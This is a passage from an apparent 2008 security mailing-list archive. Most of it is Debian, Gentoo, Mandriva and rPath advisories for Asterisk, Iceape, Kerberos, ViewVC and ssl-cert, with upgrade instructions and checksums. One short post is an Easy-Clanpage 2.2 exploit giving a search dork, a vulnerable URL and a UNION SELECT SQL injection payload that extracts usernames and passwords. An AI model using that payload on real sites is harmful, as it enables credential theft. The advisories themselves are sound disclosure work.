package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 4.0 (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg-2etch3.diff.gz Size/MD5 checksum: 181527 6a98d3db7fd54a5dd082c692f3e50042 http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg.orig.tar.gz Size/MD5 checksum: 3835589 f8ee088b2e4feffe2b35d78079f90b69 http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg-2etch3.dsc Size/MD5 checksum: 1488 181da0b7d5a604cd79be518e662b049b Architecture independent packages: http://security.debian.org/pool/updates/main/a/asterisk/asterisk-doc_1.2.13~dfsg-2etch3_all.deb Size/MD5 checksum: 1500218 de67182dd31aef4878322327034ae0ae http://security.debian.org/pool/updates/main/a/asterisk/asterisk-sounds-main_1.2.13~dfsg-2etch3_all.deb Size/MD5 checksum: 1504782 6096881223aafe96ce1285b9be1a97ad http://security.debian.org/pool/updates/main/a/asterisk/asterisk-config_1.2.13~dfsg-2etch3_all.deb Size/MD5 checksum: 131832 99911d22fb5fbf7f0520d28f0cd21af7 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-web-vmail_1.2.13~dfsg-2etch3_all.deb Size/MD5 checksum:73928 0eaff6b096a03f0830a965ed21671557 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-dev_1.2.13~dfsg-2etch3_all.deb Size/MD5 checksum: 170126 26798a8026d05a9843a63fa3ac28488e http://security.debian.org/pool/updates/main/a/asterisk/asterisk_1.2.13~dfsg-2etch3_all.deb Size/MD5 checksum: 146658 8fd6ec949bdd4fc072b4244f6c97642a alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch3_alpha.deb Size/MD5 checksum: 1934760 0999adcecf044475a12d9300c8dc2c48 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch3_alpha.deb Size/MD5 checksum: 137160 f1a2f55ed07f19114ea44639aa2be4a9 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch3_alpha.deb Size/MD5 checksum: 1898628 637feeb1ac1b25f28330b808bd0597a1 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/a/asterisk/asterisk-bristuff_1.2.13~dfsg-2etch3_amd64.deb Size/MD5 checksum: 1780328 b2c4b1c62ebc4dc13a1ea53a5c842e96 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-h323_1.2.13~dfsg-2etch3_amd64.deb Size/MD5 checksum: 133354 1f58ef3241222af34a9ca717eff2c052 http://security.debian.org/pool/updates/main/a/asterisk/asterisk-classic_1.2.13~dfsg-2etch3_amd64.deb Size/MD5 checksum: 1745634 bd5f2ee7c79247ee6f5944076b9f3442 arm ar
Easy-Clanpage 2.2 (id) Remote SQL Injection Vulnerability
# ##Easy-Clanpage v2.2 ### # SQL İnjection VuLnerabiLity ## ## # # # # # AUTHOR : MadNet # # HOMEPAGE : http://www.Shadowturk.org/ # # Mail : MadNet[at]hackertr[dot]org # # # #Source: http://easy-clanpage.de/?section=downloads&show=viewdownload&id=14 # # #Dork :"Easy-Clanpage v2.2" ## #Vunl File : # #/inc/module/online.php # #EXPLOIT : # #http://www.[site].com/[path]/?section=user&action=details&id= # #EXAMPLE : # #-1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/* # ## #www.ShadowTURK.Org ## Thanks : Str0ke and Milw0rm ##
Pizco vulnerable to buffer overflow in activex
It's possible that users that uses Pizco were vulnerable to the same vulnerability that "Aurigma ImageUploader4.ocx" that found Elazar Broad. This post is this: http://www.securityfocus.com/bid/27539 The version of ImageUploader4 is 4.1.36.0 And I say that it's possible because I find a site where I download it, but I don't saw where the Activex control is used. Web with the vulnerable control: http://cdnimg.piczo.com/images/uploader/piczo_fast_uploader.cab
[SECURITY] [DSA 1506-2] New iceape packages fix regression
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1506-2 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff March 20, 2008http://www.debian.org/security/faq - Package: iceape Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2008-0412 CVE-2008-0413 CVE-2008-0414 CVE-2008-0415 CVE-2008-0417 CVE-2008-0418 CVE-2008-0419 CVE-2008-0591 CVE-2008-0592 CVE-2008-0593 CVE-2008-0594 A regression has been fixed in iceape's frame handling code. For reference you can find the original update below: Several remote vulnerabilities have been discovered in the Iceape internet suite, an unbranded version of the Seamonkey Internet Suite. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2008-0412 Jesse Ruderman, Kai Engert, Martijn Wargers, Mats Palmgren and Paul Nickerson discovered crashes in the layout engine, which might allow the execution of arbitrary code. CVE-2008-0413 Carsten Book, Wesley Garland, Igor Bukanov, "moz_bug_r_a4", "shutdown", Philip Taylor and "tgirmann" discovered crashes in the Javascript engine, which might allow the execution of arbitrary code. CVE-2008-0414 "hong" and Gregory Fleisher discovered that file input focus vulnerabilities in the file upload control could allow information disclosure of local files. CVE-2008-0415 "moz_bug_r_a4" and Boris Zbarsky discovered discovered several vulnerabilities in Javascript handling, which could allow privilege escalation. CVE-2008-0417 Justin Dolske discovered that the password storage machanism could be abused by malicious web sites to corrupt existing saved passwords. CVE-2008-0418 Gerry Eisenhaur and "moz_bug_r_a4" discovered that a directory traversal vulnerability in chrome: URI handling could lead to information disclosure. CVE-2008-0419 David Bloom discovered a race condition in the image handling of designMode elements, which can lead to information disclosure or potentially the execution of arbitrary code. CVE-2008-0591 Michal Zalewski discovered that timers protecting security-sensitive dialogs (which disable dialog elements until a timeout is reached) could be bypassed by window focus changes through Javascript. CVE-2008-0592 It was discovered that malformed content declarations of saved attachments could prevent a user in the opening local files with a ".txt" file name, resulting in minor denial of service. CVE-2008-0593 Martin Straka discovered that insecure stylesheet handling during redirects could lead to information disclosure. CVE-2008-0594 Emil Ljungdahl and Lars-Olof Moilanen discovered that phishing protections could be bypassed with elements. For the stable distribution (etch), these problems have been fixed in version 1.0.12~pre080131b-0etch2. The Mozilla releases from the old stable distribution (sarge) are no longer supported with security updates. We recommend that you upgrade your iceape packages. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 4.0 (stable) - --- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.12~pre080131b-0etch2.diff.gz Size/MD5 checksum: 270995 2a621606e7f50a736f0d071ade4fd52f http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.12~pre080131b.orig.tar.gz Size/MD5 checksum: 43535826 39071cd311888d73254336b782109776 http://security.debian.org/pool/updates/main/i/iceape/iceape_1.0.12~pre080131b-0etch2.dsc Size/MD5 checksum: 1439 9763d1c74ce4301f14acbefbd9f5f49b Architecture independent packages: http://security.debian.org/pool/updates/main/i/iceape/iceape-dev_1.0.12~pre080131b-0etch2_all.deb Size/MD5 checksum: 3927430 ecd67a579a7de22c58812f101a3f8798 http://security.debian.org/pool/updates/main/i/iceape/mozilla-psm_1.8+1.0.12~pre080131b-0etch2_all.deb Size/MD5 checksum:27352 cebcf83eac35b663e96d742a8ce0e22d http://security.debian.org/pool/updates/main/i/iceape/mozilla-js-debugger_1.8+1.0.12~pre080131b-0etch2_all.deb Size/MD5 checksum:27380 f7e68700518fe223b0a7
[ GLSA 200803-30 ] ssl-cert eclass: Certificate disclosure
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-30 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ssl-cert eclass: Certificate disclosure Date: March 20, 2008 Bugs: #174759 ID: 200803-30 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An error in the usage of the ssl-cert eclass within multiple ebuilds might allow for disclosure of generated SSL private keys. Background == The ssl-cert eclass is a code module used by Gentoo ebuilds to generate SSL certificates. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-admin/conserver < 8.1.16 >= 8.1.16 2 mail-mta/postfix < 2.4.6-r2 >= 2.4.6-r2 *>= 2.3.8-r1 *>= 2.2.11-r1 3 net-ftp/netkit-ftpd < 0.17-r7>= 0.17-r7 4 net-im/ejabberd< 1.1.3 >= 1.1.3 5 net-irc/unrealircd < 3.2.7-r2 >= 3.2.7-r2 6 net-mail/cyrus-imapd < 2.3.9-r1 >= 2.3.9-r1 7 net-mail/dovecot < 1.0.10 >= 1.0.10 8 net-misc/stunnel < 4.21-r1>= 4.21-r1 < 4.0 9 net-nntp/inn < 2.4.3-r1 >= 2.4.3-r1 --- 9 affected packages on all of their supported architectures. --- Description === Robin Johnson reported that the docert() function provided by ssl-cert.eclass can be called by source building stages of an ebuild, such as src_compile() or src_install(), which will result in the generated SSL keys being included inside binary packages (binpkgs). Impact == A local attacker could recover the SSL keys from publicly readable binary packages when "emerge" is called with the "--buildpkg (-b)" or "--buildpkgonly (-B)" option. Remote attackers can recover these keys if the packages are served to a network. Binary packages built using "quickpkg" are not affected. Workaround == Do not use pre-generated SSL keys, but use keys that were generated using a different Certificate Authority. Resolution == Upgrading to newer versions of the above packages will neither remove possibly compromised SSL certificates, nor old binary packages. Please remove the certificates installed by Portage, and then emerge an upgrade to the package. All Conserver users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-admin/conserver-8.1.16" All Postfix 2.4 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=mail-mta/postfix-2.4.6-r2" All Postfix 2.3 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=mail-mta/postfix-2.3.8-r1" All Postfix 2.2 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=mail-mta/postfix-2.2.11-r1" All Netkit FTP Server users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-ftp/netkit-ftpd-0.17-r7" All ejabberd users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-im/ejabberd-1.1.3" All UnrealIRCd users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-irc/unrealircd-3.2.7-r2" All Cyrus IMAP Server users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-mail/cyrus-imapd-2.3.9-r1" All Dovecot users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-mail/dovecot-1.0.10" All stunnel 4 users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/stunnel-4.21" All InterNetNews users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-nntp/inn-2.4.3-r1" References == [ 1 ] CVE-2008-1383 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1383 Availability This GLSA and any updates to it are available for
rPSA-2008-0112-1 krb5 krb5-server krb5-services krb5-test krb5-workstation
rPath Security Advisory: 2008-0112-1 Published: 2008-03-19 Products: rPath Linux 1 rPath Appliance Platform Linux Service 1 Rating: Critical Exposure Level Classification: Remote Root Deterministic Unauthorized Access Updated Versions: [EMAIL PROTECTED]:1/1.4.1-7.9-1 [EMAIL PROTECTED]:1/1.4.1-7.9-1 [EMAIL PROTECTED]:1/1.4.1-7.9-1 [EMAIL PROTECTED]:1/1.4.1-7.9-1 [EMAIL PROTECTED]:1/1.4.1-7.9-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2012 https://issues.rpath.com/browse/RPL-2318 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5894 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5902 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5971 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0947 Description: Previous versions of the krb5 package contain multiple vulnerabilities, the most serious of which may allow a remote attacker to execute arbitrary code. http://wiki.rpath.com/Advisories:rPSA-2008-0112 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html
[ MDVSA-2008:071 ] - Updated Kerberos packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:071 http://www.mandriva.com/security/ ___ Package : krb5 Date: March 19, 2008 Affected: Corporate 3.0, Multi Network Firewall 2.0 ___ Problem Description: A flaw was discovered in how the Kerberos krb5kdc handled Kerberos v4 protocol packets. An unauthenticated remote attacker could use this flaw to crash the krb5kdc daemon, disclose portions of its memory, or possibly %execute arbitrary code using malformed or truncated Kerberos v4 protocol requests (CVE-2008-0062, CVE-2008-0063). This issue only affects krb5kdc when it has Kerberos v4 protocol compatibility enabled, which is a compiled-in default in all Kerberos versions that Mandriva Linux ships prior to Mandriva Linux 2008.0. Kerberos v4 protocol support can be disabled by adding v4_mode=none (without quotes) to the [kdcdefaults] section of /etc/kerberos/krb5kdc/kdc.conf. The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-001.txt ___ Updated Packages: Corporate 3.0: d671c7e0f68642556b1ba5a33d26eaf8 corporate/3.0/i586/ftp-client-krb5-1.3-6.10.C30mdk.i586.rpm 9e5a2591cee10ed62948f6d30e836863 corporate/3.0/i586/ftp-server-krb5-1.3-6.10.C30mdk.i586.rpm 7e8fc318772ff7dcd22f5b1c81bbfe6d corporate/3.0/i586/krb5-server-1.3-6.10.C30mdk.i586.rpm 45838af9454ffc5f6c06a505b4468c83 corporate/3.0/i586/krb5-workstation-1.3-6.10.C30mdk.i586.rpm fbdb6f71d9e2a939bbea33312b74c998 corporate/3.0/i586/libkrb51-1.3-6.10.C30mdk.i586.rpm 50f964ee10fc744553a862c918913b03 corporate/3.0/i586/libkrb51-devel-1.3-6.10.C30mdk.i586.rpm 667270f39306bd837b08b310a189f75d corporate/3.0/i586/telnet-client-krb5-1.3-6.10.C30mdk.i586.rpm a5a4a1a64c14164e1755ad37e35cf99d corporate/3.0/i586/telnet-server-krb5-1.3-6.10.C30mdk.i586.rpm 07535be43a1e339a0ba69cc167fbb530 corporate/3.0/SRPMS/krb5-1.3-6.10.C30mdk.src.rpm Corporate 3.0/X86_64: 0f693533eea0d49c60b20c40e6b5a872 corporate/3.0/x86_64/ftp-client-krb5-1.3-6.10.C30mdk.x86_64.rpm 061429249b1cc62647c3a95d6b2a3d8b corporate/3.0/x86_64/ftp-server-krb5-1.3-6.10.C30mdk.x86_64.rpm bda82007dd59af28240d51ca020370d1 corporate/3.0/x86_64/krb5-server-1.3-6.10.C30mdk.x86_64.rpm 9d7e810eacfc17774ee33a438cdc196d corporate/3.0/x86_64/krb5-workstation-1.3-6.10.C30mdk.x86_64.rpm b4abcda997c06b142bbae27cf3e617ef corporate/3.0/x86_64/lib64krb51-1.3-6.10.C30mdk.x86_64.rpm e3692fe347ec21c7fd25a581ef817d66 corporate/3.0/x86_64/lib64krb51-devel-1.3-6.10.C30mdk.x86_64.rpm c5da9da1f3aa15a0966f8d1644748340 corporate/3.0/x86_64/telnet-client-krb5-1.3-6.10.C30mdk.x86_64.rpm fd9ff563b0d3d58705eb3b2b4aeebc11 corporate/3.0/x86_64/telnet-server-krb5-1.3-6.10.C30mdk.x86_64.rpm 07535be43a1e339a0ba69cc167fbb530 corporate/3.0/SRPMS/krb5-1.3-6.10.C30mdk.src.rpm Multi Network Firewall 2.0: fa4c3506c056e55862b4db41e134db1c mnf/2.0/i586/libkrb51-1.3-6.10.M20mdk.i586.rpm 5c5caff1487f3284ba0c9529a831405e mnf/2.0/SRPMS/krb5-1.3-6.10.M20mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.8 (GNU/Linux) iD8DBQFH4WQ2mqjQ0CJFipgRAme0AJ9fNnZituwkl8Yx1PIECEds/A5s0QCg1ETW G9i9EWrOhEC/prfZ6UhjyX8= =RDH6 -END PGP SIGNATURE-
[ GLSA 200803-29 ] ViewVC: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-29 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ViewVC: Multiple vulnerabilities Date: March 19, 2008 Bugs: #212288 ID: 200803-29 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple security issues have been reported in ViewVC, which can be exploited by malicious people to bypass certain security restrictions. Background == ViewVC is a browser interface for CVS and Subversion version control repositories. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-apps/viewvc < 1.05 >= 1.05 Description === Multiple unspecified errors were reportedly fixed by the ViewVC development team. Impact == A remote attacker could send a specially crafted URL to the server to list CVS or SVN commits on "all-forbidden" files, access hidden CVSROOT folders, and view restricted content via the revision view, the log history, or the diff view. Workaround == There is no known workaround at this time. Resolution == All ViewVC users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-apps/viewvc-1.05" References == [ 1 ] CVE-2008-1290 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1290 [ 2 ] CVE-2008-1291 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1291 [ 3 ] CVE-2008-1292 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1292 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200803-29.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[ MDVSA-2008:070 ] - Updated Kerberos packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:070 http://www.mandriva.com/security/ ___ Package : krb5 Date: March 19, 2008 Affected: 2007.0, Corporate 4.0 ___ Problem Description: A memory management flaw was found in the GSSAPI library used by Kerberos that could result in an attempt to free already freed memory, possibly leading to a crash or allowing the execution of arbitrary code (CVE-2007-5971). A flaw was discovered in how the Kerberos krb5kdc handled Kerberos v4 protocol packets. An unauthenticated remote attacker could use this flaw to crash the krb5kdc daemon, disclose portions of its memory, or possibly %execute arbitrary code using malformed or truncated Kerberos v4 protocol requests (CVE-2008-0062, CVE-2008-0063). This issue only affects krb5kdc when it has Kerberos v4 protocol compatibility enabled, which is a compiled-in default in all Kerberos versions that Mandriva Linux ships prior to Mandriva Linux 2008.0. Kerberos v4 protocol support can be disabled by adding v4_mode=none (without quotes) to the [kdcdefaults] section of /etc/kerberos/krb5kdc/kdc.conf. A flaw in the RPC library as used in Kerberos' kadmind was discovered by Jeff Altman of Secure Endpoints. An unauthenticated remote attacker could use this vulnerability to crash kadmind or possibly execute arbitrary code in systems with certain resource limits configured; this does not affect the default resource limits used by Mandriva Linux (CVE-2008-0947). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5971 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0947 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-001.txt http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-002.txt ___ Updated Packages: Mandriva Linux 2007.0: ef17fea5e296992fb34b0d00540b4190 2007.0/i586/ftp-client-krb5-1.4.3-7.4mdv2007.0.i586.rpm dbc47795968f03dff7eb50ff34a63b8d 2007.0/i586/ftp-server-krb5-1.4.3-7.4mdv2007.0.i586.rpm 36f5b4160b9dc7d4393b8bc5f4f0b6fb 2007.0/i586/krb5-server-1.4.3-7.4mdv2007.0.i586.rpm f76121f223836939aef1f77164a7224d 2007.0/i586/krb5-workstation-1.4.3-7.4mdv2007.0.i586.rpm 65c052a4916406626b3289abdb43e0a6 2007.0/i586/libkrb53-1.4.3-7.4mdv2007.0.i586.rpm e50117c585a8560813bc93704562e726 2007.0/i586/libkrb53-devel-1.4.3-7.4mdv2007.0.i586.rpm 1f99498d879f9343510479f2791245ac 2007.0/i586/telnet-client-krb5-1.4.3-7.4mdv2007.0.i586.rpm 9ed009750d2bcf738ceefce2e4c69512 2007.0/i586/telnet-server-krb5-1.4.3-7.4mdv2007.0.i586.rpm 9e63ac2d698d562ead71d5dd8c7ae315 2007.0/SRPMS/krb5-1.4.3-7.4mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 029aad278f01c2baef9f93b86b0bc20d 2007.0/x86_64/ftp-client-krb5-1.4.3-7.4mdv2007.0.x86_64.rpm dae016ff39d8e4d9f517b3197eefd926 2007.0/x86_64/ftp-server-krb5-1.4.3-7.4mdv2007.0.x86_64.rpm 8b3fac7b20798715efdad0d0db6b4472 2007.0/x86_64/krb5-server-1.4.3-7.4mdv2007.0.x86_64.rpm 81f6c05a73c175b581790532aa8572f1 2007.0/x86_64/krb5-workstation-1.4.3-7.4mdv2007.0.x86_64.rpm 41e10d5f06e05ea4cf455a0c3420d09f 2007.0/x86_64/lib64krb53-1.4.3-7.4mdv2007.0.x86_64.rpm eeebf59564375187f01f628be3ac5132 2007.0/x86_64/lib64krb53-devel-1.4.3-7.4mdv2007.0.x86_64.rpm cff3b7303e5d157e4ef246867ba396e8 2007.0/x86_64/telnet-client-krb5-1.4.3-7.4mdv2007.0.x86_64.rpm ee55c784f89a1190efb9ce619ba34227 2007.0/x86_64/telnet-server-krb5-1.4.3-7.4mdv2007.0.x86_64.rpm 9e63ac2d698d562ead71d5dd8c7ae315 2007.0/SRPMS/krb5-1.4.3-7.4mdv2007.0.src.rpm Corporate 4.0: d4dcc40949ba7e72823de561b2b5b050 corporate/4.0/i586/ftp-client-krb5-1.4.3-5.6.20060mlcs4.i586.rpm 5e8b8cf4c051f235f2b4a3cc2a8c967c corporate/4.0/i586/ftp-server-krb5-1.4.3-5.6.20060mlcs4.i586.rpm 3c5812da62cc9a0cea89306877386ef7 corporate/4.0/i586/krb5-server-1.4.3-5.6.20060mlcs4.i586.rpm 40b114f22d7109a125cdf5243160c5f1 corporate/4.0/i586/krb5-workstation-1.4.3-5.6.20060mlcs4.i586.rpm db7506751e5178556652b74d81b06c6d corporate/4.0/i586/libkrb53-1.4.3-5.6.20060mlcs4.i586.rpm 59ec6c3b207538656f2645eb3c0adf6a corporate/4.0/i586/libkrb53-devel-1.4.3-5.6.20060mlcs4.i586.rpm fe234b5f259def09b88fba24869eba83 corporate/4.0/i586/telnet-client-krb5-1.4.3-5.6.20060mlcs4.i586.rpm e2b51de61c9a91686e98a05ea98ec05f corporate/4.0/i586/telnet-server-krb5-1.4.3-5.6.20060mlcs4.i586.rpm 6a739594760cabeb536550168eefb333 corporate/4.0/SRPMS/k
[ MDVSA-2008:069 ] - Updated Kerberos packages fix multiple vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:069 http://www.mandriva.com/security/ ___ Package : krb5 Date: March 19, 2008 Affected: 2007.1, 2008.0 ___ Problem Description: Multiple memory management flaws were found in the GSSAPI library used by Kerberos that could result in the use of already freed memory or an attempt to free already freed memory, possibly leading to a crash or allowing the execution of arbitrary code (CVE-2007-5901, CVE-2007-5971). A flaw was discovered in how the Kerberos krb5kdc handled Kerberos v4 protocol packets. An unauthenticated remote attacker could use this flaw to crash the krb5kdc daemon, disclose portions of its memory, or possibly %execute arbitrary code using malformed or truncated Kerberos v4 protocol requests (CVE-2008-0062, CVE-2008-0063). This issue only affects krb5kdc when it has Kerberos v4 protocol compatibility enabled, which is a compiled-in default in all Kerberos versions that Mandriva Linux ships prior to Mandriva Linux 2008.0. Kerberos v4 protocol support can be disabled by adding v4_mode=none (without quotes) to the [kdcdefaults] section of /etc/kerberos/krb5kdc/kdc.conf. A flaw in the RPC library as used in Kerberos' kadmind was discovered by Jeff Altman of Secure Endpoints. An unauthenticated remote attacker could use this vulnerability to crash kadmind or possibly execute arbitrary code in systems with certain resource limits configured; this does not affect the default resource limits used by Mandriva Linux (CVE-2008-0947). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5901 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5971 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0947 http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-001.txt http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2008-002.txt ___ Updated Packages: Mandriva Linux 2007.1: 64c3f5c31177dcacc99b021ec6ed1271 2007.1/i586/ftp-client-krb5-1.5.2-6.6mdv2007.1.i586.rpm 11b4194bc9edba8c0951e44660ba9955 2007.1/i586/ftp-server-krb5-1.5.2-6.6mdv2007.1.i586.rpm 23794e6e0cb1d46a329c42a04f672c5f 2007.1/i586/krb5-server-1.5.2-6.6mdv2007.1.i586.rpm 0fbb29bd81c8452d937d30fbbda62242 2007.1/i586/krb5-workstation-1.5.2-6.6mdv2007.1.i586.rpm 8f4eea60bf4ea3bfc776f1c117ceb26d 2007.1/i586/libkrb53-1.5.2-6.6mdv2007.1.i586.rpm fd5b1da0a056d995011d2b1a692e4292 2007.1/i586/libkrb53-devel-1.5.2-6.6mdv2007.1.i586.rpm ca79ccbe3f286b9069f0ae028d9816f7 2007.1/i586/telnet-client-krb5-1.5.2-6.6mdv2007.1.i586.rpm 8a7c84f1fe1bbb5338723f28d12a9f21 2007.1/i586/telnet-server-krb5-1.5.2-6.6mdv2007.1.i586.rpm 22830790ad7715479b7d4fbecc6c1e7f 2007.1/SRPMS/krb5-1.5.2-6.6mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: fc02060b7c1da08c33952e6c14fb5627 2007.1/x86_64/ftp-client-krb5-1.5.2-6.6mdv2007.1.x86_64.rpm 513fca34bdd1f2a5643a8e6adeb62e0e 2007.1/x86_64/ftp-server-krb5-1.5.2-6.6mdv2007.1.x86_64.rpm 4f42d639753a885212e6d62bfe84a121 2007.1/x86_64/krb5-server-1.5.2-6.6mdv2007.1.x86_64.rpm 6b2ca028321fb08199be20a4aedef4a0 2007.1/x86_64/krb5-workstation-1.5.2-6.6mdv2007.1.x86_64.rpm 4d453dc2a579e74e29dfc052197fedc1 2007.1/x86_64/lib64krb53-1.5.2-6.6mdv2007.1.x86_64.rpm b22d9f1b515df1a5270d2d4c373b7dd3 2007.1/x86_64/lib64krb53-devel-1.5.2-6.6mdv2007.1.x86_64.rpm 21b245649de9e38e43782bd1a18922a7 2007.1/x86_64/telnet-client-krb5-1.5.2-6.6mdv2007.1.x86_64.rpm 1322374ab1c15b5c1392ee4ae5f915e7 2007.1/x86_64/telnet-server-krb5-1.5.2-6.6mdv2007.1.x86_64.rpm 22830790ad7715479b7d4fbecc6c1e7f 2007.1/SRPMS/krb5-1.5.2-6.6mdv2007.1.src.rpm Mandriva Linux 2008.0: 3ee5a309927b830bf8559a872161384b 2008.0/i586/ftp-client-krb5-1.6.2-7.1mdv2008.0.i586.rpm 1835baa43ab27aac2493dc7821bafa8a 2008.0/i586/ftp-server-krb5-1.6.2-7.1mdv2008.0.i586.rpm 5e8369c201ac4678a7bc46590107e45f 2008.0/i586/krb5-1.6.2-7.1mdv2008.0.i586.rpm 94277e76faf2b75553c2e6250e428a43 2008.0/i586/krb5-server-1.6.2-7.1mdv2008.0.i586.rpm 695d5b85347b906401433fa55177be1a 2008.0/i586/krb5-workstation-1.6.2-7.1mdv2008.0.i586.rpm 4696cbae0ce644c265b74ff4ce59a865 2008.0/i586/libkrb53-1.6.2-7.1mdv2008.0.i586.rpm 